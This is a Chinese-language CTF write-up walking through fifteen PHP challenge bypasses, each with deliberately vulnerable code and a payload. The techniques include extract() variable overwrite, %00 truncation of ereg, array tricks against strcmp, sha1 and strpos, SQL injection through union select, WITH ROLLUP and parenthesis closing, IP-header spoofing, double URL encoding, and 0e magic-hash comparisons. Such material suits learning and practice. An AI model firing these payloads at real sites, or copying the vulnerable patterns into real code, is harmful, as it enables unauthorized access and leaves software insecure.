1、extract变量覆盖

<?php$flag='xxx'; 
extract($_GET);if(isset($shiyan)){ $content=trim(file_get_contents($flag));if($shiyan==$content){ echo'ctf{xxx}'; }else{ echo'Oh.no';} }?>

学习一下extract：

定义和用法

extract() 函数从数组中将变量导入到当前的符号表。

该函数使用数组键名作为变量名，使用数组键值作为变量值。针对数组中的每个元素，将在当前符号表中创建对应的一个变量。

第二个参数 type 用于指定当某个变量已经存在，而数组中又有同名元素时，extract() 函数如何对待这样的冲突。

该函数返回成功导入到符号表中的变量数目。
语法

extract(array,extract_rules,prefix)

具体不说，给几个例子：

<?php
$a = "Original";
$my_array = array("a" => "Cat","b" => "Dog", "c" => "Horse");
extract($my_array);
echo "\$a = $a; \$b = $b; \$c = $c";
?>

运行结果：$a = Cat; $b = Dog; $c = Horse说明原来的$a被覆盖了。

第二个例子：

<?php
$a = "Original";
$my_array = array("a" => "Cat", "b" => "Dog", "c" => "Horse");extract($my_array, EXTR_PREFIX_SAME, "dup");echo "\$a = $a; \$b = $b; \$c = $c; \$dup_a = $dup_a";
?>

运行结果：$a = Original; $b = Dog; $c = Horse; $dup_a = Cat这样前面的$a没有被覆盖。

需要让$flag为名的文件的内容和$shiyan的值相同，可以上传$shiyan和$flag然后通过extract函数提取后进行覆盖。

$flag是文件名，当然我们不知道后台有什么文件，所以如果$flag只能上传空值，那么$shiyan也上传为空值即可，那么payload就有点多了：

?shiyan=
?shiyan=&flag
?shiyan=&content     //这样flag照样为空

2、绕过过滤的空白字符

这个涉及is_numeric，空白字符绕过intval和回文检测
主要代码如下：

function is_palindrome_number($number) { $number = strval($number); //strval — 获取变量的字符串值$i = 0; $j = strlen($number) - 1; //strlen — 获取字符串长度while($i < $j) { if($number[$i] !== $number[$j]) { return false; } $i++; $j--; } return true; 
} if(is_numeric($_REQUEST['number'])) //is_numeric — 检测变量是否为数字或数字字符串 
{ $info="sorry, you cann't input a number!"; 
}
elseif($req['number']!=strval(intval($req['number']))) //intval — 获取变量的整数值
{$info = "number must be equal to it's integer!! ";  
}
else
{$value1 = intval($req["number"]);$value2 = intval(strrev($req["number"]));  if($value1!=$value2){$info="no, this is not a palindrome number!";}else{if(is_palindrome_number($req["number"])){$info = "nice! {$value1} is a palindrome number!"; }else{$info=$flag;}}
}
echo $info;

漏洞点：
1）is_numeric()函数在传递的number前面或者后面加上%00就不会被检测成数字（最好加在后面，加在前面有时候没用）
2）elseif这里需要让传递number的值等于他的整数值
3）最后的else就是既要让number是回文，又要绕过is_palindrome_number()回文检测函数，又要绕过is_palindrome_number函数是通过strval取number的字符串值，在回文前加上空白字符%0c(\f)就能使其字符串值不是回文而整数值是回文；或者是加上%2b（+号），因为+11=11。
也就是加上字符之后使strval()处理之后能得到其整数值，就是%0c和%2b了

payload：

number=%00%0c11
number=%00%2b11
number=0e-0%00        //0的回文还是00e+0%00按理也行，但是测试失败

%0c和%2b怎么找到的，其余的字符就不可以，其实也是用ASCII的256个字符写脚本fuzz出来的，fuzz技术还需要学习
贴上fuzz过程：
本地搭建代码

<?php
function is_palindrome_number($number) {$number = strval($number); //strval — 获取变量的字符串值$i = 0;$j = strlen($number) - 1; //strlen — 获取字符串长度while($i < $j) {if($number[$i] !== $number[$j]) {return false;}$i++;$j--;}return true;
}
$a = trim($_GET['number']);
var_dump(($a==strval(intval($a)))&(intval($a)==intval(strrev($a)))&!is_palindrome_number($a))
?>

fuzz代码：

import requests
for i in range(256):rq = requests.get("http://127.0.0.1/vuln/CTF/1/index.php?number=%s191"%("%%%02X"%i))if '1' in rq.text:print "%%%02X"%i

3、多重加密

主要代码：

$login = unserialize(gzuncompress(base64_decode($requset['token'])));
//gzuncompress:进行字符串压缩
//unserialize: 将已序列化的字符串还原回 PHP 的值$db = new db();
$row = $db->select('user=\''.mysql_real_escape_string($login['user']).'\'');
//mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。if($login['user'] === 'ichunqiu')
{echo $flag;
}

前面的class db其实在拿flag这是用不到的。

<?php
$arr = array(['user'] === 'ichunqiu');
$token = base64_encode(gzcompress(serialize($arr)));
print_r($token);
// echo $token;
?>

eJxLtDK0qs60MrBOAuJaAB5uBBQ=
拿到token修改一下session发包就行了

4、SQL注入_WITH ROLLUP绕过

主要代码：
一个过滤代码

function AttackFilter($StrKey,$StrValue,$ArrReq){  if (is_array($StrValue)){$StrValue=implode($StrValue);         //返回由数组元素组合成的字符串}if (preg_match("/".$ArrReq."/is",$StrValue)==1){     //匹配成功一次后就会停止匹配print "水可载舟，亦可赛艇！";exit();}
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)";
foreach($_POST as $key=>$value){ 
//遍历数组AttackFilter($key,$value,$filter);
}

然后是给flag的代码

$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); 
//执行一条 MySQL 查询
if (mysql_num_rows($query) == 1) {           //返回结果集中行的数目$key = mysql_fetch_array($query);           //返回根据从结果集取得的行生成的数组，如果没有更多行则返回 falseif($key['pwd'] == $_POST['pwd']) {print "CTF{XXXXXX}";}

首先对post的数据进行了and|select|from|where|union|join|sleep|benchmark|,|(|)的过滤，然后查询出来的值要和我们post的pwd相等

此处使用WITH ROLLUP进行绕过，首先学习一下WITH ROLLUP

WITH ROLLUP是对group by的结果进行进一步的汇总然后显示，在group by 列名 with rollup 中，倘若按列名分组后，列的属性值是不相同的，会生成一条分组条件的列为null的一条新的数据。而如果查询结果是唯一的，一会生成一条分组条件所在列为null的数据。

我们就是要通过with rollup使sql语句查询结果为null，然后不输入pwd使pwd为null就可以使$key[‘pwd’] == $_POST[‘pwd’]

payload：
admin’ GROUP BY password WITH ROLLUP LIMIT 1 OFFSET 1–
offset后面的值需要尝试才能找到pwd是null的行

mysql> select * from test group by pwd with rollup;
+-------+------------+
| user  | pwd        |
+-------+------------+
| guest | alsomypass |
| admin | mypass     |
| admin | NULL       |
+-------+------------+
3 rows in set

5、ereg()、eregi()绕过

<?php 
$flag = "flag";if (isset ($_GET['password'])) 
{if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE){echo '<p>You password must be alphanumeric</p>';}else if (strlen($_GET['password']) < 8 && $_GET['password'] > 9999999){if (strpos ($_GET['password'], '*-*') !== FALSE) //strpos — 查找字符串首次出现的位置{die('Flag: ' . $flag);}else{echo('<p>*-* have not been found</p>'); }}else {echo '<p>Invalid password</p>'; }} 
?>

ereg是PHP 4, PHP 5中的函数正则过滤，eregi()是不区分大小写的匹配，这两个函数的绕过方法相同
ereg ("¹+$", $_GET[‘password’])
password需要由大小写字母和数组组成， ereg可以用%00截断，%00被识别为尾部，对其后面的字符不予理睬。

payload：password=1e9%00*-*

6、strcmp比较字符串

<?php
$flag = "flag";
if (isset($_GET['a'])) {  if (strcmp($_GET['a'], $flag) == 0) //如果 str1 小于 str2 返回 < 0； 如果 str1大于 str2返回 > 0；如果两者相等，返回 0。 //比较两个字符串（区分大小写） die('Flag: '.$flag);  else  print 'No';  
}
?>

数组绕过即可
payload：?a[]=

7、sha()函数比较绕过

<?php$flag = "flag";if (isset($_GET['name']) and isset($_GET['password'])) 
{if ($_GET['name'] == $_GET['password'])echo '<p>Your password can not be your name!</p>';else if (sha1($_GET['name']) === sha1($_GET['password']))die('Flag: '.$flag);elseecho '<p>Invalid password.</p>';
}
elseecho '<p>Login first!</p>';
?>

name和password的内容不能等但是sha1值要相等，md5的话可以碰撞解决，sha1的话可以用数组，因为sha1处理数组返回false，这样就是false===false
payload：?name[]=1&password[]=2

8、SESSION验证绕过

<?php
$flag = "flag";session_start(); 
if (isset ($_GET['password'])) {if ($_GET['password'] == $_SESSION['password'])die ('Flag: '.$flag);elseprint '<p>Wrong guess.</p>';
}
mt_srand((microtime() ^ rand(1, 10000)) % rand(1, 10000) + rand(1, 10000));
?>

这个比较简单了就，如果session中没有password，参数password传递空就行，有的话删除或者改成一样即可

9、union select注入绕过md5密码

主要代码：

$user = $_POST[user];
$pass = md5($_POST[pass]);//sql语句// select pw from php where user='' union select 'e10adc3949ba59abbe56e057f20f883e' # // ?user=' union select 'e10adc3949ba59abbe56e057f20f883e' #&pass=123456$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {printf("Error: %s\n", mysql_error($conn));exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {//如果 str1 小于 str2 返回 < 0； 如果 str1 大于 str2 返回 > 0；如果两者相等，返回 0。echo "<p>Logged in! Key:************** </p>";
}
else {echo("<p>Log in failure!</p>");}
}

就是union select注入了
payload：
?user=’ union select ‘e10adc3949ba59abbe56e057f20f883e’ #&pass=123456

10、urldecode二次编码绕过

<?php
if(eregi("hackerDJ",$_GET[id])) {echo("<p>not allowed!</p>");exit();
}$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{echo "<p>Access granted!</p>";echo "<p>flag: *****************} </p>";
}
?>

漏洞成因：
因为url中的字符或者特殊字符是自动进行了urlencode的，所以在接收的时候会进行一次urldecode，这个代码在接收参数之后进行了第二次的urldecode，导致出现漏洞

hackerDJ，随便一个字母进行两次的urlencode即可
payload：?id=%2568ackerDJ

11、sql闭合绕过.php

$user = $_POST[user];
$pass = md5($_POST[pass]);//select user from php where (user='admin')#
//exp:admin')#$sql = "select user from php where (user='$user') and (pw='$pass')";

直接闭合括号即可，payload：user=admin’)#

12、ip头绕过

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))$cip = $_SERVER["REMOTE_ADDR"];
else$cip = "0.0.0.0";
return $cip;
}$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误！你的IP不在访问列表之内！";
}
?>

这几个头伪造一个即可

13、md5碰撞

<?php$md51 = md5('QNKCDZO');
$a = @$_GET['a'];
$md52 = @md5($a);
if(isset($a)){
if ($a != 'QNKCDZO' && $md51 == $md52) {echo "nctf{*****************}";
} else {echo "false!!!";
}}
else{echo "please input a";}?>

md5之后有很多以0e开头的，因为php对字符串的弱类型==比较这些以0e开头的字符串都会相等，打到碰撞绕过目的

14、intval四舍五入绕过

<?phpif($_GET[id]) {mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$id = intval($_GET[id]);$query = @mysql_fetch_array(mysql_query("select content from ctf2 where id='$id'"));if ($_GET[id]==1024) {echo "<p>no! try again</p>";}else{echo($query[content]);}
}
?>

payload：?id=1024.1

15、strpos数组绕过NULL与ereg正则%00截断

<?php$flag = "flag";if (isset ($_GET['nctf'])) {if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE)echo '必须输入数字才行';else if (strpos ($_GET['nctf'], '#biubiubiu') !== FALSE)   die('Flag: '.$flag);elseecho '骚年，继续努力吧啊~';}?>

方法一：?nctf[]=
ereg处理数组返回Null，strpos处理数组也返回Null

方法二：nctf=1%00%23biubiubiu
%00造成ereg截断，同时也包含了#biubiubiu

---

1. a-zA-Z0-9 ↩︎